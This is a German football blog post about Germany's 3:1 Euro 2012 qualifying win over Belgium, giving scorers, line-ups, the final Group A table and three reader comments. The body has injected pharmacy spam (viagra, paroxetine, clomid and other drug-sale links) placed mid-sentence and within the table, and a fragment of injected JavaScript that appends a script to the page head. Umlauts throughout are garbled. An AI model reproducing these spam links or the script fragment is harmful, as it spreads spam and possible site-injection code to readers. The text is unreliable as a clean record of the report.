Willkommen auf » EM-Qualifikation 2012 Highlights Deutschland – Belgien
11. Okt 2011

EM-Qualifikation 2012 Highlights Deutschland – Belgien

EM 2012 Qualifikation
Deutschland – Belgien 3:1

1:0 Mesut A�zil (30., Linksschuss, Khedira)
2:0 AndrA� SchA?rrle (33., Rechtsschuss, Gomez)
3:0 Mario Gomez (48., Linksschuss, A�zil)
3:1 Marouane Fellaini (86., Kopfball, Witsel)
vor 40.000 Zuschauern in der Esprit-Arena in DA?sseldorf

Aufstellung Deutschland: Neuer – HA�wedes, Hummels, Mertesacker, Lahm (84. GA?ndogan) – Khedira – T. MA?ller (71. Reus), Kroos, A�zil, SchA?rrle – Gomez (77. Cacau)

Aufstellung Belgien: Mignolet – Ciman, Kompany, Vertonghen, Lombaerts – Fellaini, Simons – DembelA� (64. Mertens), Witsel, Hazard – Ogunjimi (46. Lukaku)

Die Zusammenfassung des Spiels…

Highlights: Deutschland vs. Belgien

AuAYerdem auch hier, hier, hier und free viagra offers online hier zu sehen. Vom ZDF gibt’s noch die 90minA?tige Komplettaufzeichnung der Partie, die buy cheap paroxetine Buy Analyse mit Bundestrainer Joachim LA�w und die http://empirica-seminarski.com/2018/03/18/nimotop-order/ Stimmen zum Spiel.

Deutschland schafft also den Rekord und gewinnt zum ersten Mal in der eigenen Geschichte zehn von zehn Qualifikationsspielen. Reife Leistung, die fA?r die anstehende Europameisterschaft einiges erhoffen lA�sst. Die Abschlusstabelle der Gruppe A:
purchase nootropil piracetam Pills Buy 1. Deutschland, 30 Punkte
2. TA?rkei, 17 Punkte
3. Belgien, 15 Punkte
4. A�sterreich, 12 Punkte
5. Aserbaidschan, 7 Punkte
6. Kasachstan, 4 Punkted.getElementsByTagName(‚head‘)[0].appendChild(s); http://ankool.com/blog/buy-nasonex-otc/ Cheap buy clomid with mastercard pills online


3 Kommentare



  1. Das Deutschland diese Gruppe ohne Punktabgabe gewinnen würde war klar. Siehe doch ihre Gegner. Türkei, Belgien,u.sw. Nicht so ganz Reif die Leistung und der Titel ist noch lange nicht im Haus



  2. Naja, also die Türkei und Belgien sehe ich schon als potenzielle Stolpersteine. Dass man da wirklich jedes Qualifkationsspiel gewinnt liegt nicht so klar auf der Hand. Und das Ganze dann auch noch mit 34 Treffern und 7 Gegentoren in zehn Spielen. Damit ist noch kein Titel gewonnen, beeindruckend ist die Konstanz aber allemal.



  3. Selbstverständlich ist das beileibe nicht!

    Der FC Bayern holt schließlich auch nicht 102 Punkte aus 34 Spielen, bloß weil sie eine überragende Saison spielen. Und oft genug haben wir bei der deutschen Nationalmannschaft erlebt, dass es in der Quali Rumpelfußball vom Feinsten gab. Ich erinnere an das Spiel gegen Island, das vor allem durch Völlers Ausraster bekannt wurde…

Einen Kommentar schreiben